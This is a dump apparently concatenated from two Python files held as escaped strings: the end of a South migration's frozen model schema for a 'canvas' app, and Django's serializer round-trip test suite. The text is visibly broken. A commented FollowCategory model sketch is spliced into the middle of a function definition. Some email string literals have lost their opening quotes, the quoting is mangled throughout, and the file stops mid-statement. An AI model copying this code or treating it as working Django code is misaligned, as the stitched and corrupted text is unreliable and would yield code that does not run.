(\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.content\': {\n \'Meta\': {\'object_name\': \'Content\'},\n \'alpha\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'animated\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'id\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'40\', \'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'default\': ""\'127.0.0.1\'"", \'max_length\': \'15\'}),\n \'remix_of\': (\'django.db.models.fields.related.ForeignKey\', [], {\'blank\': \'True\', \'related_name\': ""\'remixes\'"", \'null\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'remix_text\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'1000\', \'blank\': \'True\'}),\n \'source_url\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'4000\', \'blank\': \'True\'}),\n \'stamps_used\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'symmetrical\': \'False\', \'related_name\': ""\'used_as_stamp\'"", \'blank\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'url_mapping\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.ContentUrlMapping\']"", \'null\': \'True\', \'blank\': \'True\'}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'})\n },\n \'canvas.contenturlmapping\': {\n \'Meta\': {\'object_name\': \'ContentUrlMapping\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'})\n },\n \'canvas.emailunsubscribe\': {\n \'Meta\': {\'object_name\': \'EmailUnsubscribe\'},\n \'email\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'255\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'})\n 
},\n \'canvas.externalcontent\': {\n \'Meta\': {\'object_name\': \'ExternalContent\'},\n \'_data\': (\'django.db.models.fields.TextField\', [], {\'default\': ""\'{}\'""}),\n \'content_type\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'2\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'parent_comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'external_content\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'source_url\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'4000\', \'null\': \'True\', \'blank\': \'True\'})\n },\n \'canvas.facebookinvite\': {\n \'Meta\': {\'object_name\': \'FacebookInvite\'},\n \'fb_message_id\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'255\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'invited_fbid\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'invitee\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'facebook_invited_from\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'inviter\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'facebook_sent_invites\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.facebookuser\': {\n \'Meta\': {\'object_name\': \'FacebookUser\'},\n \'email\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'fb_uid\': (\'django.db.models.fields.BigIntegerField\', [], {\'unique\': \'True\'}),\n \'first_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'gender\': (\'django.db.models.fields.PositiveSmallIntegerField\', [], {\'default\': \'0\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'last_invited\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'}),\n \'last_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'user\': (\'django.db.models.fields.related.OneToOneField\', [], {\'to\': ""orm[\'auth.User\']"", \'unique\': \'True\', \'null\': \'True\', \'blank\': \'True\'})\n },\n \'canvas.followcategory\': {\n \'Meta\': {\'unique_together\': ""((\'user\', \'category\'),)"", \'object_name\': \'FollowCategory\'},\n \'category\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'followers\'"", \'to\': ""orm[\'canvas.Category\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'following\'"", \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.invitecode\': {\n \'Meta\': {\'object_name\': \'InviteCode\'},\n \'code\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'32\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'invitee\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'invited_from\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'inviter\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'sent_invites\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.remixplugin\': 
{\n \'Meta\': {\'object_name\': \'RemixPlugin\'},\n \'author\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'s3md5\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'})\n },\n \'canvas.stashcontent\': {\n \'Meta\': {\'object_name\': \'StashContent\'},\n \'content\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Content\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.userinfo\': {\n \'Meta\': {\'object_name\': \'UserInfo\'},\n \'avatar\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Content\']"", \'null\': \'True\'}),\n \'bio_text\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'2000\', \'blank\': \'True\'}),\n \'enable_timeline\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'True\'}),\n \'enable_timeline_posts\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'facebook_id\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\', \'null\': \'True\', \'blank\': \'True\'}),\n \'follower_count\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\', \'blank\': \'True\'}),\n \'free_invites\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'10\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'invite_bypass\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'255\', \'blank\': \'True\'}),\n \'is_qa\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'post_anonymously\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'profile_image\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']"", \'null\': \'True\'}),\n \'trust_changed\': (\'canvas.util.UnixTimestampField\', [], {\'null\': \'True\', \'blank\': \'True\'}),\n \'trusted\': (\'django.db.models.fields.NullBooleanField\', [], {\'null\': \'True\', \'blank\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.OneToOneField\', [], {\'to\': ""orm[\'auth.User\']"", \'unique\': \'True\'})\n },\n \'canvas.usermoderationlog\': {\n \'Meta\': {\'object_name\': \'UserModerationLog\'},\n \'action\': (\'django.db.models.fields.IntegerField\', [], {}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'moderator\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']"", \'null\': \'True\'}),\n \'note\': (\'django.db.models.fields.TextField\', [], {}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'moderation_log\'"", \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.userwarning\': {\n \'Meta\': {\'object_name\': \'UserWarning\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'to\': ""orm[\'canvas.Comment\']"", \'null\': \'True\', \'blank\': \'True\'}),\n \'confirmed\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'}),\n \'custom_message\': (\'django.db.models.fields.TextField\', [], {}),\n 
\'disable_user\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'issued\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'stock_message\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'user_warnings\'"", \'to\': ""orm[\'auth.User\']""}),\n \'viewed\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'})\n },\n \'canvas.welcomeemailrecipient\': {\n \'Meta\': {\'object_name\': \'WelcomeEmailRecipient\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'recipient\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']"", \'unique\': \'True\'})\n },\n \'contenttypes.contenttype\': {\n \'Meta\': {\'ordering\': ""(\'name\',)"", \'unique_together\': ""((\'app_label\', \'model\'),)"", \'object_name\': \'ContentType\', \'db_table\': ""\'django_content_type\'""},\n \'app_label\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'model\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'})\n }\n }\n\n complete_apps = [\'canvas\']\n', '""""""\nA test spanning all the capabilities of all the serializers.\n\nThis class defines sample data and a dynamically generated\ntest case that is capable of testing the capabilities of\nthe serializers. This includes all valid data values, plus\nforward, backwards and self references.\n""""""\nfrom __future__ import unicode_literals\n\nimport datetime\nimport decimal\nfrom unittest import expectedFailure, skipUnless\n\ntry:\n import yaml\nexcept ImportError:\n yaml = None\n\nfrom django.core import serializers\nfrom django.core.serializers import SerializerDoesNotExist\nfrom django.core.serializers.base import DeserializationError\nfrom django.core.serializers.xml_serializer import DTDForbidden\nfrom django.db import connection, models\nfrom django.http import HttpResponse\nfrom django.test import TestCase\nfrom django.utils import six\nfrom django.utils.encoding import force_text\nfrom django.utils.functional import curry\n\nfrom .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData,\n FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData,\n GenericIPAddressData, NullBooleanData, PositiveIntegerData,\n PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData,\n GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData,\n FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData,\n Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData,\n DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData,\n GenericIPAddressPKData, PositiveIntegerPKData,\n PositiveSmallIntegerPKData, SlugPKData, SmallPKData,\n AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel,\n ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel,\n ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel,\n NaturalKeyAnchor, FKDataNaturalKey)\n\n# A set of functions that can be used to recreate\n# test data objects of various kinds.\n# The save method is a raw base model save, to make\n# sure that the data in the database matches the\n# exact test case.\ndef 
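# Note: the frozen `models` dict above is South's snapshot of the app schema: every
# field is stored as a ('dotted.path.to.FieldClass', [args], {kwargs}) triple so the
# migration can rebuild a fake ORM without importing live model code. A rough sketch
# of what one entry encodes (names read off the 'canvas.followcategory' entry above;
# the Category model is assumed, and this is South-era Django, so no on_delete):

from django.db import models
from django.contrib.auth.models import User

class FollowCategory(models.Model):
    # mirrors the frozen 'canvas.followcategory' entry: the AutoField pk is
    # implicit, the two FKs carry the same related_name kwargs as the snapshot
    category = models.ForeignKey('canvas.Category', related_name='followers')
    user = models.ForeignKey(User, related_name='following')

    class Meta:
        unique_together = (('user', 'category'),)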
data_create(pk, klass, data):\n instance = klass(id=pk)\n instance.data = data\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef generic_create(pk, klass, data):\n instance = klass(id=pk)\n instance.data = data[0]\n models.Model.save_base(instance, raw=True)\n for tag in data[1:]:\n instance.tags.create(data=tag)\n return [instance]\n\ndef fk_create(pk, klass, data):\n instance = klass(id=pk)\n setattr(instance, \'data_id\', data)\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef m2m_create(pk, klass, data):\n instance = klass(id=pk)\n models.Model.save_base(instance, raw=True)\n instance.data = data\n return [instance]\n\ndef im2m_create(pk, klass, data):\n instance = klass(id=pk)\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef im_create(pk, klass, data):\n instance = klass(id=pk)\n instance.right_id = data[\'right\']\n instance.left_id = data[\'left\']\n if \'extra\' in data:\n instance.extra = data[\'extra\']\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef o2o_create(pk, klass, data):\n instance = klass()\n instance.data_id = data\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef pk_create(pk, klass, data):\n instance = klass()\n instance.data = data\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef inherited_create(pk, klass, data):\n instance = klass(id=pk,**data)\n # This isn\'t a raw save because:\n # 1) we\'re testing inheritance, not field behavior, so none\n # of the field values need to be protected.\n # 2) saving the child class and having the parent created\n # automatically is easier than manually creating both.\n models.Model.save(instance)\n created = [instance]\n for klass,field in instance._meta.parents.items():\n created.append(klass.objects.get(id=pk))\n return created\n\n# A set of functions that can be used to compare\n# test data objects of various kinds\ndef data_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n if klass == BinaryData and data is not None:\n testcase.assertEqual(bytes(data), bytes(instance.data),\n ""Objects with PK=%d not equal; expected \'%s\' (%s), got \'%s\' (%s)"" % (\n pk, repr(bytes(data)), type(data), repr(bytes(instance.data)),\n type(instance.data))\n )\n else:\n testcase.assertEqual(data, instance.data,\n ""Objects with PK=%d not equal; expected \'%s\' (%s), got \'%s\' (%s)"" % (\n pk, data, type(data), instance, type(instance.data))\n )\n\ndef generic_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data[0], instance.data)\n testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by(\'id\')])\n\ndef fk_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data, instance.data_id)\n\ndef m2m_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data, [obj.id for obj in instance.data.order_by(\'id\')])\n\ndef im2m_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n #actually nothing else to check, the instance just should exist\n\ndef im_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data[\'left\'], instance.left_id)\n testcase.assertEqual(data[\'right\'], instance.right_id)\n if \'extra\' in data:\n testcase.assertEqual(data[\'extra\'], instance.extra)\n else:\n testcase.assertEqual(""doesn\'t matter"", instance.extra)\n\ndef o2o_compare(testcase, pk, klass, 
data):\n instance = klass.objects.get(data=data)\n testcase.assertEqual(data, instance.data_id)\n\ndef pk_compare(testcase, pk, klass, data):\n instance = klass.objects.get(data=data)\n testcase.assertEqual(data, instance.data)\n\ndef inherited_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n for key,value in data.items():\n testcase.assertEqual(value, getattr(instance,key))\n\n# Define some data types. Each data type is\n# actually a pair of functions; one to create\n# and one to compare objects of that type\ndata_obj = (data_create, data_compare)\ngeneric_obj = (generic_create, generic_compare)\nfk_obj = (fk_create, fk_compare)\nm2m_obj = (m2m_create, m2m_compare)\nim2m_obj = (im2m_create, im2m_compare)\nim_obj = (im_create, im_compare)\no2o_obj = (o2o_create, o2o_compare)\npk_obj = (pk_create, pk_compare)\ninherited_obj = (inherited_create, inherited_compare)\n\ntest_data = [\n # Format: (data type, PK value, Model Class, data)\n (data_obj, 1, BinaryData, six.memoryview(b""\\x05\\xFD\\x00"")),\n (data_obj, 2, BinaryData, None),\n (data_obj, 5, BooleanData, True),\n (data_obj, 6, BooleanData, False),\n (data_obj, 10, CharData, ""Test Char Data""),\n (data_obj, 11, CharData, """"),\n (data_obj, 12, CharData, ""None""),\n (data_obj, 13, CharData, ""null""),\n (data_obj, 14, CharData, ""NULL""),\n (data_obj, 15, CharData, None),\n # (We use something that will fit into a latin1 database encoding here,\n # because that is still the default used on many system setups.)\n (data_obj, 16, CharData, \'\\xa5\'),\n (data_obj, 20, DateData, datetime.date(2006,6,16)),\n (data_obj, 21, DateData, None),\n (data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)),\n (data_obj, 31, DateTimeData, None),\n (data_obj, 40, EmailData, dummy@email.com""),\n (data_obj, 41, EmailData, None),\n (data_obj, 42, EmailData, """"),\n (data_obj, 50, FileData, \'file:///foo/bar/whiz.txt\'),\n# (data_obj, 51, FileData, None),\n (data_obj, 52, FileData, """"),\n (data_obj, 60, FilePathData, ""/foo/bar/whiz.txt""),\n (data_obj, 61, FilePathData, None),\n (data_obj, 62, FilePathData, """"),\n (data_obj, 70, DecimalData, decimal.Decimal(\'12.345\')),\n (data_obj, 71, DecimalData, decimal.Decimal(\'-12.345\')),\n (data_obj, 72, DecimalData, decimal.Decimal(\'0.0\')),\n (data_obj, 73, DecimalData, None),\n (data_obj, 74, FloatData, 12.345),\n (data_obj, 75, FloatData, -12.345),\n (data_obj, 76, FloatData, 0.0),\n (data_obj, 77, FloatData, None),\n (data_obj, 80, IntegerData, 123456789),\n (data_obj, 81, IntegerData, -123456789),\n (data_obj, 82, IntegerData, 0),\n (data_obj, 83, IntegerData, None),\n #(XX, ImageData\n (data_obj, 90, IPAddressData, ""127.0.0.1""),\n (data_obj, 91, IPAddressData, None),\n (data_obj, 95, GenericIPAddressData, ""127.0.0.1""),\n (data_obj, 96, GenericIPAddressData, None),\n (data_obj, 100, NullBooleanData, True),\n (data_obj, 101, NullBooleanData, False),\n (data_obj, 102, NullBooleanData, None),\n (data_obj, 120, PositiveIntegerData, 123456789),\n (data_obj, 121, PositiveIntegerData, None),\n (data_obj, 130, PositiveSmallIntegerData, 12),\n (data_obj, 131, PositiveSmallIntegerData, None),\n (data_obj, 140, SlugData, ""this-is-a-slug""),\n (data_obj, 141, SlugData, None),\n (data_obj, 142, SlugData, """"),\n (data_obj, 150, SmallData, 12),\n (data_obj, 151, SmallData, -12),\n (data_obj, 152, SmallData, 0),\n (data_obj, 153, SmallData, None),\n (data_obj, 160, TextData, """"""This is a long piece of text.\nIt contains line breaks.\nSeveral of them.\nThe 
end.""""""),\n (data_obj, 161, TextData, """"),\n (data_obj, 162, TextData, None),\n (data_obj, 170, TimeData, datetime.time(10,42,37)),\n (data_obj, 171, TimeData, None),\n\n (generic_obj, 200, GenericData, [\'Generic Object 1\', \'tag1\', \'tag2\']),\n (generic_obj, 201, GenericData, [\'Generic Object 2\', \'tag2\', \'tag3\']),\n\n (data_obj, 300, Anchor, ""Anchor 1""),\n (data_obj, 301, Anchor, ""Anchor 2""),\n (data_obj, 302, UniqueAnchor, ""UAnchor 1""),\n\n (fk_obj, 400, FKData, 300), # Post reference\n (fk_obj, 401, FKData, 500), # Pre reference\n (fk_obj, 402, FKData, None), # Empty reference\n\n (m2m_obj, 410, M2MData, []), # Empty set\n (m2m_obj, 411, M2MData, [300,301]), # Post reference\n (m2m_obj, 412, M2MData, [500,501]), # Pre reference\n (m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference\n\n (o2o_obj, None, O2OData, 300), # Post reference\n (o2o_obj, None, O2OData, 500), # Pre reference\n\n (fk_obj, 430, FKSelfData, 431), # Pre reference\n (fk_obj, 431, FKSelfData, 430), # Post reference\n (fk_obj, 432, FKSelfData, None), # Empty reference\n\n (m2m_obj, 440, M2MSelfData, []),\n (m2m_obj, 441, M2MSelfData, []),\n (m2m_obj, 442, M2MSelfData, [440, 441]),\n (m2m_obj, 443, M2MSelfData, [445, 446]),\n (m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]),\n (m2m_obj, 445, M2MSelfData, []),\n (m2m_obj, 446, M2MSelfData, []),\n\n (fk_obj, 450, FKDataToField, ""UAnchor 1""),\n (fk_obj, 451, FKDataToField, ""UAnchor 2""),\n (fk_obj, 452, FKDataToField, None),\n\n (fk_obj, 460, FKDataToO2O, 300),\n\n (im2m_obj, 470, M2MIntermediateData, None),\n\n #testing post- and prereferences and extra fields\n (im_obj, 480, Intermediate, {\'right\': 300, \'left\': 470}),\n (im_obj, 481, Intermediate, {\'right\': 300, \'left\': 490}),\n (im_obj, 482, Intermediate, {\'right\': 500, \'left\': 470}),\n (im_obj, 483, Intermediate, {\'right\': 500, \'left\': 490}),\n (im_obj, 484, Intermediate, {\'right\': 300, \'left\': 470, \'extra\': ""extra""}),\n (im_obj, 485, Intermediate, {\'right\': 300, \'left\': 490, \'extra\': ""extra""}),\n (im_obj, 486, Intermediate, {\'right\': 500, \'left\': 470, \'extra\': ""extra""}),\n (im_obj, 487, Intermediate, {\'right\': 500, \'left\': 490, \'extra\': ""extra""}),\n\n (im2m_obj, 490, M2MIntermediateData, []),\n\n (data_obj, 500, Anchor, ""Anchor 3""),\n (data_obj, 501, Anchor, ""Anchor 4""),\n (data_obj, 502, UniqueAnchor, ""UAnchor 2""),\n\n (pk_obj, 601, BooleanPKData, True),\n (pk_obj, 602, BooleanPKData, False),\n (pk_obj, 610, CharPKData, ""Test Char PKData""),\n# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)),\n# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)),\n (pk_obj, 640, EmailPKData, dummy@email.com""),\n# (pk_obj, 650, FilePKData, \'file:///foo/bar/whiz.txt\'),\n (pk_obj, 660, FilePathPKData, ""/foo/bar/whiz.txt""),\n (pk_obj, 670, DecimalPKData, decimal.Decimal(\'12.345\')),\n (pk_obj, 671, DecimalPKData, decimal.Decimal(\'-12.345\')),\n (pk_obj, 672, DecimalPKData, decimal.Decimal(\'0.0\')),\n (pk_obj, 673, FloatPKData, 12.345),\n (pk_obj, 674, FloatPKData, -12.345),\n (pk_obj, 675, FloatPKData, 0.0),\n (pk_obj, 680, IntegerPKData, 123456789),\n (pk_obj, 681, IntegerPKData, -123456789),\n (pk_obj, 682, IntegerPKData, 0),\n# (XX, ImagePKData\n (pk_obj, 690, IPAddressPKData, ""127.0.0.1""),\n (pk_obj, 695, GenericIPAddressPKData, ""127.0.0.1""),\n # (pk_obj, 700, NullBooleanPKData, True),\n # (pk_obj, 701, NullBooleanPKData, False),\n (pk_obj, 720, PositiveIntegerPKData, 123456789),\n (pk_obj, 730, 
PositiveSmallIntegerPKData, 12),\n (pk_obj, 740, SlugPKData, ""this-is-a-slug""),\n (pk_obj, 750, SmallPKData, 12),\n (pk_obj, 751, SmallPKData, -12),\n (pk_obj, 752, SmallPKData, 0),\n# (pk_obj, 760, TextPKData, """"""This is a long piece of text.\n# It contains line breaks.\n# Several of them.\n# The end.""""""),\n# (pk_obj, 770, TimePKData, datetime.time(10,42,37)),\n# (pk_obj, 790, XMLPKData, """"),\n\n (data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),\n (data_obj, 810, ModifyingSaveData, 42),\n\n (inherited_obj, 900, InheritAbstractModel, {\'child_data\':37,\'parent_data\':42}),\n (inherited_obj, 910, ExplicitInheritBaseModel, {\'child_data\':37,\'parent_data\':42}),\n (inherited_obj, 920, InheritBaseModel, {\'child_data\':37,\'parent_data\':42}),\n\n (data_obj, 1000, BigIntegerData, 9223372036854775807),\n (data_obj, 1001, BigIntegerData, -9223372036854775808),\n (data_obj, 1002, BigIntegerData, 0),\n (data_obj, 1003, BigIntegerData, None),\n (data_obj, 1004, LengthModel, 0),\n (data_obj, 1005, LengthModel, 1),\n]\n\nnatural_key_test_data = [\n (data_obj, 1100, NaturalKeyAnchor, ""Natural Key Anghor""),\n (fk_obj, 1101, FKDataNaturalKey, 1100),\n (fk_obj, 1102, FKDataNaturalKey, None),\n]\n\n# Because Oracle treats the empty string as NULL, Oracle is expected to fail\n# when field.empty_strings_allowed is True and the value is None; skip these\n# tests.\nif connection.features.interprets_empty_strings_as_nulls:\n test_data = [data for data in test_data\n if not (data[0] == data_obj and\n data[2]._meta.get_field(\'data\').empty_strings_allowed and\n data[3] is None)]\n\n# Regression test for #8651 -- a FK to an object iwth PK of 0\n# This won\'t work on MySQL since it won\'t let you create an object\n# with a primary key of 0,\nif connection.features.allows_primary_key_0:\n test_data.extend([\n (data_obj, 0, Anchor, ""Anchor 0""),\n (fk_obj, 465, FKData, 0),\n ])\n\n# Dynamically create serializer tests to ensure that all\n# registered serializers are automatically tested.\nclass SerializerTests(TestCase):\n def test_get_unknown_serializer(self):\n """"""\n #15889: get_serializer(\'nonsense\') raises a SerializerDoesNotExist\n """"""\n with self.assertRaises(SerializerDoesNotExist):\n serializers.get_serializer(""nonsense"")\n\n with self.assertRaises(KeyError):\n serializers.get_serializer(""nonsense"")\n\n # SerializerDoesNotExist is instantiated with the nonexistent format\n with self.assertRaises(SerializerDoesNotExist) as cm:\n serializers.get_serializer(""nonsense"")\n self.assertEqual(cm.exception.args, (""nonsense"",))\n\n def test_unregister_unkown_serializer(self):\n with self.assertRaises(SerializerDoesNotExist):\n serializers.unregister_serializer(""nonsense"")\n\n def test_get_unkown_deserializer(self):\n with self.assertRaises(SerializerDoesNotExist):\n serializers.get_deserializer(""nonsense"")\n\n def test_json_deserializer_exception(self):\n with self.assertRaises(DeserializationError):\n for obj in serializers.deserialize(""json"", """"""[{""pk"":1}""""""):\n pass\n\n @skipUnless(yaml, ""PyYAML not installed"")\n def test_yaml_deserializer_exception(self):\n with self.assertRaises(DeserializationError):\n for obj in serializers.deserialize(""yaml"", ""{""):\n pass\n\n def test_serialize_proxy_model(self):\n BaseModel.objects.create(parent_data=1)\n base_objects = BaseModel.objects.all()\n proxy_objects = ProxyBaseModel.objects.all()\n proxy_proxy_objects = ProxyProxyBaseModel.objects.all()\n base_data = serializers.serialize(""json"", 
base_objects)\n proxy_data = serializers.serialize(""json"", proxy_objects)\n proxy_proxy_data = serializers.serialize(""json"", proxy_proxy_objects)\n self.assertEqual(base_data, proxy_data.replace(\'proxy\', \'\'))\n self.assertEqual(base_data, proxy_proxy_data.replace(\'proxy\', \'\'))\n\n\ndef serializerTest(format, self):\n\n # Create all the objects defined in the test data\n objects = []\n instance_count = {}\n for (func, pk, klass, datum) in test_data:\n with connection.constraint_checks_disabled():\n objects.extend(func[0](pk, klass, datum))\n\n # Get a count of the number of objects created for each class\n for klass in instance_count:\n instance_count[klass] = klass.objects.count()\n\n # Add the generic tagged objects to the object list\n objects.extend(Tag.objects.all())\n\n # Serialize the test database\n serialized_data = serializers.serialize(format, objects, indent=2)\n\n for obj in serializers.deserialize(format, serialized_data):\n obj.save()\n\n # Assert that the deserialized data is the same\n # as the original source\n for (func, pk, klass, datum) in test_data:\n func[1](self, pk, klass, datum)\n\n # Assert that the number of objects deserialized is the\n # same as the number that was serialized.\n for klass, count in instance_count.items():\n self.assertEqual(count, klass.objects.count())\n\nif connection.vendor == \'mysql\' and six.PY3:\n # Existing MySQL DB-API drivers fail on binary data.\n serializerTest = expectedFailure(serializerTest)\n\n\ndef naturalKeySerializerTest(format, self):\n # Create all the objects defined in the test data\n objects = []\n instance_count = {}\n for (func, pk, klass, datum) in natural_key_test_data:\n with connection.constraint_checks_disabled():\n objects.extend(func[0](pk, klass, datum))\n\n # Get a count of the number of objects created for each class\n for klass in instance_count:\n instance_count[klass] = klass.objects.count()\n\n # Serialize the test database\n serialized_data = serializers.serialize(format, objects, indent=2,\n use_natural_keys=True)\n\n for obj in serializers.deserialize(format, serialized_data):\n obj.save()\n\n # Assert that the deserialized data is the same\n # as the original source\n for (func, pk, klass, datum) in natural_key_test_data:\n func[1](self, pk, klass, datum)\n\n # Assert that the number of objects deserialized is the\n # same as the number that was serialized.\n for klass, count in instance_count.items():\n self.assertEqual(count, klass.objects.count())\n\ndef fieldsTest(format, self):\n obj = ComplexModel(field1=\'first\', field2=\'second\', field3=\'third\')\n obj.save_base(raw=True)\n\n # Serialize then deserialize the test database\n serialized_data = 